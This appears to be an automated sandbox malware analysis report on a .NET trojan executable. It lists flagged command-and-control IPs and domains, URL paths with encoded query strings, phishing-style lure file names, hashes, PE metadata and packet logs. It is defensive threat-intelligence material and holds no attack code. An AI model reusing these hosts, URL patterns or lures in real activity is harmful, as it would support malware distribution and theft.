                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      unknown
                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameXhU4EXUp0x.exe, 00000000.00000002.653505336.00000000026B1000.00000004.00000001.sdmpfalse
                                        high
                                        http://www.sakkal.comexplorer.exe, 00000005.00000000.681251721.000000000B976000.00000002.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        unknown

                                        Contacted IPs

                                        • No. of IPs < 25%
                                        • 25% < No. of IPs < 50%
                                        • 50% < No. of IPs < 75%
                                        • 75% < No. of IPs

                                        Public

                                        IPDomainCountryFlagASNASN NameMalicious
                                        66.235.200.146
                                        gentrypartyof8.comUnited States
                                        13335CLOUDFLARENETUStrue
                                        23.82.229.132
                                        www.rsyueda.comUnited States
                                        396190LEASEWEB-USA-SEA-10UStrue

                                        General Information

                                        Joe Sandbox Version:32.0.0 Black Diamond
                                        Analysis ID:433531
                                        Start date:12.06.2021
                                        Start time:08:56:25
                                        Joe Sandbox Product:CloudBasic
                                        Overall analysis duration:0h 10m 21s
                                        Hypervisor based Inspection enabled:false
                                        Report type:full
                                        Sample file name:XhU4EXUp0x.exe
                                        Cookbook file name:default.jbs
                                        Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                        Number of analysed new started processes analysed:21
                                        Number of new started drivers analysed:0
                                        Number of existing processes analysed:0
                                        Number of existing drivers analysed:0
                                        Number of injected processes analysed:1
                                        Technologies:
                                        • HCA enabled
                                        • EGA enabled
                                        • HDC enabled
                                        • AMSI enabled
                                        Analysis Mode:default
                                        Analysis stop reason:Timeout
                                        Detection:MAL
                                        Classification:mal100.troj.evad.winEXE@7/1@2/2
                                        EGA Information:Failed
                                        HDC Information:
                                        • Successful, ratio: 17.9% (good quality ratio 16.3%)
                                        • Quality average: 73.8%
                                        • Quality standard deviation: 30.8%
                                        HCA Information:
                                        • Successful, ratio: 100%
                                        • Number of executed functions: 94
                                        • Number of non-executed functions: 168
                                        Cookbook Comments:
                                        • Adjust boot time
                                        • Enable AMSI
                                        • Found application associated with file extension: .exe
                                        Warnings:
                                        Show All
                                        • Exclude process from analysis (whitelisted): taskhostw.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe, UsoClient.exe, wuapihost.exe
                                        • Excluded IPs from analysis (whitelisted): 204.79.197.222, 13.88.21.125, 52.147.198.201, 52.113.196.254, 104.43.139.144, 20.82.209.104, 20.54.104.15, 20.54.7.98, 205.185.216.10, 205.185.216.42, 20.54.26.129, 92.122.213.194, 92.122.213.247, 20.82.210.154
                                        • Excluded domains from analysis (whitelisted): fp.msedge.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, a1449.dscg2.akamai.net, arc.msn.com, consumerrp-displaycatalog-aks2eap-europe.md.mp.microsoft.com.akadns.net, a-0019.a-msedge.net, iris-de-ppe-azsc-neu.northeurope.cloudapp.azure.com, teams-9999.teams-msedge.net, a-0019.standard.a-msedge.net, audownload.windowsupdate.nsatc.net, au.download.windowsupdate.com.hwcdn.net, 1.perf.msedge.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, au-bg-shim.trafficmanager.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, ctldl.windowsupdate.com, skypedataprdcolcus16.cloudapp.net, cds.d2s7q6s2.hwcdn.net, consumerrp-displaycatalog-aks2aks-europe.md.mp.microsoft.com.akadns.net, skypedataprdcoleus16.cloudapp.net, ris.api.iris.microsoft.com, blobcollector.events.data.trafficmanager.net, teams-ring.teams-9999.teams-msedge.net, teams-ring.msedge.net, skypedataprdcolwus15.cloudapp.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net, neu-consumerrp-displaycatalog-aks2aks-europe.md.mp.microsoft.com.akadns.net
                                        • Not all processes where analyzed, report is missing behavior information
                                        • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                        • Report size getting too big, too many NtOpenKeyEx calls found.

                                        Simulations

                                        Behavior and APIs

                                        TimeTypeDescription
                                        08:57:13API Interceptor1x Sleep call for process: XhU4EXUp0x.exe modified

                                        Joe Sandbox View / Context

                                        IPs

                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                        66.235.200.146New Purchase Order20210609.exeGet hashmaliciousBrowse
                                        • www.anderson-anderson.com/un8c/?6lGd=HBZ81PLPUzqhOj&3f-H3H=EENVCx8DcYxC77hOTbV1SAybrq7ihI4TvqnYxLujxv6ep3jMUAI9807ilL37bAvbTVrR
                                        packa.....(1).exeGet hashmaliciousBrowse
                                        • www.apexpioneer.com/wdva/?kfD4qZ=qWl9Mj/s+HilBOtVYaSZVR6j4m9BeajRzFuKOkq+ALHs1EAUycBQc15lgYPA8iZZOcHD&kr0=dbF0vFoPNvL
                                        New order 201534.pdf.exeGet hashmaliciousBrowse
                                        • www.thedailymino.com/sbqi/?8pdPxFYX=jXb6weh8fwwMUEgPJJl7RJ0MRYZqFSz6owdMJ8CEOPRP4uFAZVBZ7eXod2M1Xtzg6qh0&_FNlAt=tVEl9tDHXfB4
                                        New Order_PO 1164_HD-F 4020 6K.exeGet hashmaliciousBrowse
                                        • www.anderson-anderson.com/un8c/?D8ODAr=EENVCx8DcYxC77hOTbV1SAybrq7ihI4TvqnYxLujxv6ep3jMUAI9807ilIXrUh/jNwCW&mJ=V6AHzvxh
                                        New Order_PO 1164_HD-F 4020 6K.exeGet hashmaliciousBrowse
                                        • www.anderson-anderson.com/un8c/?Lh0l=EENVCx8DcYxC77hOTbV1SAybrq7ihI4TvqnYxLujxv6ep3jMUAI9807ilIXrUh/jNwCW&VTKh=vBZtYDQXqZ4DGn
                                        y6f8O0kbEB.exeGet hashmaliciousBrowse
                                        • www.taratakeson.com/oerg/?ndndnZ=UtWlYrO0rhjH&mHLD_0=dr4pMwcdhZcmPSbPHAIEo/sox+gcSbBb1FVNS74e5R2NObgAqDDHvg7Hj8ybvDNWoVhE
                                        bibviv.exeGet hashmaliciousBrowse
                                        • www.milkweedmagic.com/vns/
                                        INVOICE PAYMENT.exeGet hashmaliciousBrowse
                                        • www.milkweedmagic.com/vns/?nloHn6=zPqtcJu8h&OH5LRV=dxIiDTMmZIUelDEuKFBNrZVGQoGe1rqzTAT6E2MP4OmWiXtk9zOjG3OmaVxdpx2vqn8e
                                        BL Draft copy.exeGet hashmaliciousBrowse
                                        • www.smallpeo.com/sx8c/?inzXrV1h=CQJBYFRSx3Pkz4hmjXzNOjG1WISSVLs1fX4LX3HiJ6zoF9rBVgsTdld9Os8/rzow8SJA&SP=cnxT3HrH
                                        2os1TIXTXk.exeGet hashmaliciousBrowse
                                        • www.iidiotproof.com/mdi/?Yn=490O4/0fh9aUX7Eo1RdW8uGCBI43DKhy4NK5PQpMhOFz6rL2znJpXpofqYOF+JlL3+nX&mvKtg=Y4C4_fDHvx98fJ5
                                        03102021.xlsGet hashmaliciousBrowse
                                        • baxtercode.com/qkhpnucmzts/44267.5622407407.dat
                                        03102021.xlsGet hashmaliciousBrowse
                                        • baxtercode.com/qkhpnucmzts/44267.5507399306.dat
                                        03102021.xlsGet hashmaliciousBrowse
                                        • baxtercode.com/qkhpnucmzts/44267.5414023148.dat
                                        orii11.exeGet hashmaliciousBrowse
                                        • www.iidiotproof.com/mdi/?ndn4iL=490O4/0fh9aUX7Eo1RdW8uGCBI43DKhy4NK5PQpMhOFz6rL2znJpXpofqbu/uYFztZGQ&OR9=uTypBLyh3rCtd
                                        orii11.exeGet hashmaliciousBrowse
                                        • www.iidiotproof.com/mdi/?8pp=490O4/0fh9aUX7Eo1RdW8uGCBI43DKhy4NK5PQpMhOFz6rL2znJpXpofqYOvh5VLz8vX&sZCx=1bYdfPf8ef5pjPm
                                        PO.x00991882822.xlsmGet hashmaliciousBrowse
                                        • www.rmpclean.com/private/?-ZL=kjFT_jlXCZeHrh&FVTt=Uhbi9DfUBq2i/1fkh0yGI21N5OQMN5zBtkTJbOEZT9D8cf6FKtFeyjvu/14BaEQ5k4UB
                                        Parcel _009887 .exeGet hashmaliciousBrowse
                                        • www.ocicoxford.com/csw6/?t8bHuZw=efwaGXT9IzbmNtOzDnCu+48vppNLQWQKGJFN33tYCz0tX5X/vDpmiH8bd6jrvtNwDjI3p9k8/g==&2d=llsp
                                        P.O-DT1692.exeGet hashmaliciousBrowse
                                        • www.drtarver.com/g65/?hL0=/G2o2cr0v4Q8hBBM9UJDjH+yY22wUVLVeIfqLGL5GIR6ySKGryVcUhqqpJFQ9LO6Iwep&Wr=LhnLHrv8d
                                        SAMSUNG C&T UPCOMING PROJECTS19-MP.exe.exeGet hashmaliciousBrowse
                                        • www.elrodeorestaurantbw.com/cdl/?Mfg=/L1lIqGS5r2x+RFPi+XkQGVOlUslsJfdMM9Npew4xv9wNb7VMt18zc8R4PiLn7n17TkB&uVxpj=ojO0dJYX1B
                                        AWB_SHIPPING_DOCUMENT_pdf.exeGet hashmaliciousBrowse
                                        • www.lincolnreadymeals.com/me2z/?absDxBr=WOPwKhxv/yLwNDnXBLmuN1eR3SzsT6kHFNnvJn0nwfrdF7aBYBJOwB9MozwDSP7grAKd&pPX=EFQpsLbPFZvt

                                        Domains

                                        No context

                                        ASN

                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                        CLOUDFLARENETUS1VTzed95Tz.exeGet hashmaliciousBrowse
                                        • 104.21.45.72
                                        DHL AWB TRACKING DETAILS.exeGet hashmaliciousBrowse
                                        • 104.21.19.200
                                        Proforma Invoice.exeGet hashmaliciousBrowse
                                        • 104.21.19.200
                                        TLUN2Qvsx2.exeGet hashmaliciousBrowse
                                        • 104.23.98.190
                                        rL2F1mjb2l.exeGet hashmaliciousBrowse
                                        • 104.23.99.190
                                        tvijATOn6L.exeGet hashmaliciousBrowse
                                        • 104.23.99.190
                                        8964532115.exeGet hashmaliciousBrowse
                                        • 172.67.188.154
                                        DHL_2761228.exeGet hashmaliciousBrowse
                                        • 162.159.133.233
                                        0900988099900000.exeGet hashmaliciousBrowse
                                        • 172.67.188.154
                                        Payment Advice.exeGet hashmaliciousBrowse
                                        • 104.21.19.200
                                        VM64DGCRMN5XGK.htmGet hashmaliciousBrowse
                                        • 104.16.18.94
                                        1EFNborqwh.dllGet hashmaliciousBrowse
                                        • 104.20.185.68
                                        OrderKLB210568.exeGet hashmaliciousBrowse
                                        • 104.16.13.194
                                        Purchase_Order.exeGet hashmaliciousBrowse
                                        • 104.21.64.212
                                        main_setup_x86x64.exeGet hashmaliciousBrowse
                                        • 172.67.188.69
                                        b9f5bca9a22f08aad48674bc42e4eaf72ab8aa3d652ba.exeGet hashmaliciousBrowse
                                        • 104.26.9.187
                                        LsWgkxVLk1.dllGet hashmaliciousBrowse
                                        • 104.20.184.68
                                        HHHyXsu7Vj.dllGet hashmaliciousBrowse
                                        • 104.20.184.68
                                        7Nboq835Fc.exeGet hashmaliciousBrowse
                                        • 104.21.19.200
                                        moq fob order.exeGet hashmaliciousBrowse
                                        • 172.67.188.154
                                        LEASEWEB-USA-SEA-10USProduct_Samples.exeGet hashmaliciousBrowse
                                        • 23.82.229.141
                                        RFQ_BRAT_METAL_TECH_LTD.exeGet hashmaliciousBrowse
                                        • 23.82.229.141
                                        Airwaybill # 6913321715.exeGet hashmaliciousBrowse
                                        • 23.82.149.3
                                        8UsA.shGet hashmaliciousBrowse
                                        • 172.241.159.235
                                        493bfe21_by_Libranalysis.exeGet hashmaliciousBrowse
                                        • 23.82.149.3
                                        PAGO 50,867.00 USD (ANTICIPO) 23042021 DOC-20204207MT-1.exeGet hashmaliciousBrowse
                                        • 23.82.229.141
                                        Rio International LLC URGENT REQUEST FOR QUOTATION.exeGet hashmaliciousBrowse
                                        • 23.82.229.141
                                        NEW ORDER ELO-05756485.exeGet hashmaliciousBrowse
                                        • 23.82.149.10
                                        OC CVE9362 _TVOP-MIO 22(C) 2021,pdf.exeGet hashmaliciousBrowse
                                        • 23.82.230.186
                                        order samples 056-059_pdf.exeGet hashmaliciousBrowse
                                        • 23.82.225.149
                                        order samples 056-062 _pdf.exeGet hashmaliciousBrowse
                                        • 23.82.225.149
                                        OPSzlwylj5.exeGet hashmaliciousBrowse
                                        • 173.234.15.207
                                        BSG_ptf.exeGet hashmaliciousBrowse
                                        • 23.82.225.149
                                        FeDex Shipment Confirmation.exeGet hashmaliciousBrowse
                                        • 23.82.229.136
                                        FeDex Shipment Confirmation.exeGet hashmaliciousBrowse
                                        • 23.82.229.136
                                        yqfUONVqpk.exeGet hashmaliciousBrowse
                                        • 173.234.15.207
                                        sntU1XoQa3.exeGet hashmaliciousBrowse
                                        • 173.234.15.207
                                        vvUkaRlJUJ.exeGet hashmaliciousBrowse
                                        • 173.234.15.207
                                        ZRz0Aq1Rf0.dllGet hashmaliciousBrowse
                                        • 23.82.78.4
                                        hkcmd.exeGet hashmaliciousBrowse
                                        • 173.234.15.207

                                        JA3 Fingerprints

                                        No context

                                        Dropped Files

                                        No context

                                        Created / dropped Files

                                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\XhU4EXUp0x.exe.log
                                        Process:C:\Users\user\Desktop\XhU4EXUp0x.exe
                                        File Type:ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):1406
                                        Entropy (8bit):5.341099307467139
                                        Encrypted:false
                                        SSDEEP:24:MLU84jE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4sAmER:MgvjHK5HKXE1qHiYHKhQnoPtHoxHhAHg
                                        MD5:E5FA1A53BA6D70E18192AF6AF7CFDBFA
                                        SHA1:1C076481F11366751B8DA795C98A54DE8D1D82D5
                                        SHA-256:1D7BAA6D3EB5A504FD4652BC01A0864DEE898D35D9E29D03EB4A60B0D6405D83
                                        SHA-512:77850814E24DB48E3DDF9DF5B6A8110EE1A823BAABA800F89CD353EAC7F72E48B13F3F4A4DC8E5F0FAA707A7F14ED90577CF1CB106A0422F0BEDD1EFD2E940E4
                                        Malicious:true
                                        Reputation:moderate, very likely benign file
                                        Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a

                                        Static File Info

                                        General

                                        File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                        Entropy (8bit):7.6744819259251145
                                        TrID:
                                        • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                        • Win32 Executable (generic) a (10002005/4) 49.75%
                                        • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                        • Windows Screen Saver (13104/52) 0.07%
                                        • Generic Win/DOS Executable (2004/3) 0.01%
                                        File name:XhU4EXUp0x.exe
                                        File size:907264
                                        MD5:49c83eceb8a816b959a778e5f2e78801
                                        SHA1:ead9055c813de47edfec5bc46a0d896df4b4af2e
                                        SHA256:2f4d0e2ce90ab2c35dcba4c85e38346eae6ac2cef0f939ccdd21cade4d6343ca
                                        SHA512:09b42603c00de62fe0426f202a6809c0d7ed2164f6e3da1ab124a9d02e75eea115a2ad650905a2df4e9d9bbdb4347c4283eed1c161cfdf549713cbb46ca6a6d1
                                        SSDEEP:24576:EE4VwfX9zrNeBUdtEqTGokrWc4eJNPs2ruVc:EE4VwfX9PwBU8rWc5rGc
                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......`..............P.................. ........@.. .......................@............@................................

                                        File Icon

                                        Icon Hash:00828e8e8686b000

                                        Static PE Info

                                        General

                                        Entrypoint:0x4decea
                                        Entrypoint Section:.text
                                        Digitally signed:false
                                        Imagebase:0x400000
                                        Subsystem:windows gui
                                        Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                        DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                        Time Stamp:0x60C3DF04 [Fri Jun 11 22:09:08 2021 UTC]
                                        TLS Callbacks:
                                        CLR (.Net) Version:v4.0.30319
                                        OS Version Major:4
                                        OS Version Minor:0
                                        File Version Major:4
                                        File Version Minor:0
                                        Subsystem Version Major:4
                                        Subsystem Version Minor:0
                                        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                        Entrypoint Preview

                                        Instruction
                                        jmp dword ptr [00402000h]
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al

                                        Data Directories

                                        NameVirtual AddressVirtual Size Is in Section
                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_IMPORT0xdec980x4f.text
                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0xe00000x5dc.rsrc
                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0xe20000xc.reloc
                                        IMAGE_DIRECTORY_ENTRY_DEBUG0xdeb600x1c.text
                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                        Sections

                                        NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                        .text0x20000xdccf00xdce00False0.803978980971data7.68116376135IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                        .rsrc0xe00000x5dc0x600False0.426432291667data4.164077085IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                        .reloc0xe20000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                        Resources

                                        NameRVASizeTypeLanguageCountry
                                        RT_VERSION0xe00900x34cdata
                                        RT_MANIFEST0xe03ec0x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                                        Imports

                                        DLLImport
                                        mscoree.dll_CorExeMain

                                        Version Infos

                                        DescriptionData
                                        Translation0x0000 0x04b0
                                        LegalCopyrightCopyright 2017
                                        Assembly Version1.0.0.0
                                        InternalNameProfileOptimization.exe
                                        FileVersion1.0.0.0
                                        CompanyName
                                        LegalTrademarks
                                        Comments
                                        ProductNameThinkCoffee
                                        ProductVersion1.0.0.0
                                        FileDescriptionThinkCoffee
                                        OriginalFilenameProfileOptimization.exe

                                        Network Behavior

                                        Network Port Distribution

                                        TCP Packets

                                        TimestampSource PortDest PortSource IPDest IP
                                        Jun 12, 2021 08:58:45.443835974 CEST4976280192.168.2.466.235.200.146
                                        Jun 12, 2021 08:58:45.486952066 CEST804976266.235.200.146192.168.2.4
                                        Jun 12, 2021 08:58:45.487123966 CEST4976280192.168.2.466.235.200.146
                                        Jun 12, 2021 08:58:45.487462997 CEST4976280192.168.2.466.235.200.146
                                        Jun 12, 2021 08:58:45.529809952 CEST804976266.235.200.146192.168.2.4
                                        Jun 12, 2021 08:58:45.999707937 CEST4976280192.168.2.466.235.200.146
                                        Jun 12, 2021 08:58:46.042366028 CEST804976266.235.200.146192.168.2.4
                                        Jun 12, 2021 08:58:46.042442083 CEST4976280192.168.2.466.235.200.146
                                        Jun 12, 2021 08:59:06.257075071 CEST4976580192.168.2.423.82.229.132
                                        Jun 12, 2021 08:59:06.451848030 CEST804976523.82.229.132192.168.2.4
                                        Jun 12, 2021 08:59:06.452025890 CEST4976580192.168.2.423.82.229.132
                                        Jun 12, 2021 08:59:06.452203989 CEST4976580192.168.2.423.82.229.132
                                        Jun 12, 2021 08:59:06.651827097 CEST804976523.82.229.132192.168.2.4
                                        Jun 12, 2021 08:59:06.651859045 CEST804976523.82.229.132192.168.2.4
                                        Jun 12, 2021 08:59:06.651873112 CEST804976523.82.229.132192.168.2.4
                                        Jun 12, 2021 08:59:06.651887894 CEST804976523.82.229.132192.168.2.4
                                        Jun 12, 2021 08:59:06.652347088 CEST4976580192.168.2.423.82.229.132
                                        Jun 12, 2021 08:59:06.652540922 CEST4976580192.168.2.423.82.229.132
                                        Jun 12, 2021 08:59:06.847349882 CEST804976523.82.229.132192.168.2.4

                                        UDP Packets

                                        TimestampSource PortDest PortSource IPDest IP
                                        Jun 12, 2021 08:57:05.901299000 CEST5315753192.168.2.48.8.8.8
                                        Jun 12, 2021 08:57:05.951527119 CEST53531578.8.8.8192.168.2.4
                                        Jun 12, 2021 08:57:06.667735100 CEST5802853192.168.2.48.8.8.8
                                        Jun 12, 2021 08:57:06.718683958 CEST53580288.8.8.8192.168.2.4
                                        Jun 12, 2021 08:57:07.914366961 CEST5309753192.168.2.48.8.8.8
                                        Jun 12, 2021 08:57:07.965502977 CEST53530978.8.8.8192.168.2.4
                                        Jun 12, 2021 08:57:08.203623056 CEST4925753192.168.2.48.8.8.8
                                        Jun 12, 2021 08:57:08.266376972 CEST53492578.8.8.8192.168.2.4
                                        Jun 12, 2021 08:57:09.575119019 CEST6238953192.168.2.48.8.8.8
                                        Jun 12, 2021 08:57:09.634443998 CEST53623898.8.8.8192.168.2.4
                                        Jun 12, 2021 08:57:10.707788944 CEST4991053192.168.2.48.8.8.8
                                        Jun 12, 2021 08:57:10.769614935 CEST53499108.8.8.8192.168.2.4
                                        Jun 12, 2021 08:57:11.819053888 CEST5585453192.168.2.48.8.8.8
                                        Jun 12, 2021 08:57:11.882215023 CEST53558548.8.8.8192.168.2.4
                                        Jun 12, 2021 08:57:12.799154043 CEST6454953192.168.2.48.8.8.8
                                        Jun 12, 2021 08:57:12.860248089 CEST53645498.8.8.8192.168.2.4
                                        Jun 12, 2021 08:57:13.952930927 CEST6315353192.168.2.48.8.8.8
                                        Jun 12, 2021 08:57:14.003428936 CEST53631538.8.8.8192.168.2.4
                                        Jun 12, 2021 08:57:14.747575045 CEST5299153192.168.2.48.8.8.8
                                        Jun 12, 2021 08:57:14.797682047 CEST53529918.8.8.8192.168.2.4
                                        Jun 12, 2021 08:57:15.725955009 CEST5370053192.168.2.48.8.8.8
                                        Jun 12, 2021 08:57:15.786371946 CEST53537008.8.8.8192.168.2.4
                                        Jun 12, 2021 08:57:16.712888956 CEST5172653192.168.2.48.8.8.8
                                        Jun 12, 2021 08:57:16.763209105 CEST53517268.8.8.8192.168.2.4
                                        Jun 12, 2021 08:57:17.877006054 CEST5679453192.168.2.48.8.8.8
                                        Jun 12, 2021 08:57:17.933020115 CEST53567948.8.8.8192.168.2.4
                                        Jun 12, 2021 08:57:19.560508013 CEST5653453192.168.2.48.8.8.8
                                        Jun 12, 2021 08:57:19.620259047 CEST53565348.8.8.8192.168.2.4
                                        Jun 12, 2021 08:57:20.493185043 CEST5662753192.168.2.48.8.8.8
                                        Jun 12, 2021 08:57:20.545531988 CEST53566278.8.8.8192.168.2.4
                                        Jun 12, 2021 08:57:21.318283081 CEST5662153192.168.2.48.8.8.8
                                        Jun 12, 2021 08:57:21.368737936 CEST53566218.8.8.8192.168.2.4
                                        Jun 12, 2021 08:57:22.212704897 CEST6311653192.168.2.48.8.8.8
                                        Jun 12, 2021 08:57:22.262896061 CEST53631168.8.8.8192.168.2.4
                                        Jun 12, 2021 08:57:23.036264896 CEST6407853192.168.2.48.8.8.8
                                        Jun 12, 2021 08:57:23.086296082 CEST53640788.8.8.8192.168.2.4
                                        Jun 12, 2021 08:57:23.833759069 CEST6480153192.168.2.48.8.8.8
                                        Jun 12, 2021 08:57:23.884001970 CEST53648018.8.8.8192.168.2.4
                                        Jun 12, 2021 08:57:24.777329922 CEST6172153192.168.2.48.8.8.8
                                        Jun 12, 2021 08:57:24.838646889 CEST53617218.8.8.8192.168.2.4
                                        Jun 12, 2021 08:57:25.728360891 CEST5125553192.168.2.48.8.8.8
                                        Jun 12, 2021 08:57:25.786494970 CEST53512558.8.8.8192.168.2.4
                                        Jun 12, 2021 08:57:35.281550884 CEST6152253192.168.2.48.8.8.8
                                        Jun 12, 2021 08:57:35.343091011 CEST53615228.8.8.8192.168.2.4
                                        Jun 12, 2021 08:57:58.055152893 CEST5233753192.168.2.48.8.8.8
                                        Jun 12, 2021 08:57:58.217106104 CEST53523378.8.8.8192.168.2.4
                                        Jun 12, 2021 08:57:59.370914936 CEST5504653192.168.2.48.8.8.8
                                        Jun 12, 2021 08:57:59.433738947 CEST53550468.8.8.8192.168.2.4
                                        Jun 12, 2021 08:58:00.118191004 CEST4961253192.168.2.48.8.8.8
                                        Jun 12, 2021 08:58:00.274250031 CEST53496128.8.8.8192.168.2.4
                                        Jun 12, 2021 08:58:00.799945116 CEST4928553192.168.2.48.8.8.8
                                        Jun 12, 2021 08:58:00.861430883 CEST53492858.8.8.8192.168.2.4
                                        Jun 12, 2021 08:58:01.438102007 CEST5060153192.168.2.48.8.8.8
                                        Jun 12, 2021 08:58:01.506112099 CEST53506018.8.8.8192.168.2.4
                                        Jun 12, 2021 08:58:01.673754930 CEST6087553192.168.2.48.8.8.8
                                        Jun 12, 2021 08:58:01.674573898 CEST5644853192.168.2.48.8.8.8
                                        Jun 12, 2021 08:58:01.727037907 CEST53608758.8.8.8192.168.2.4
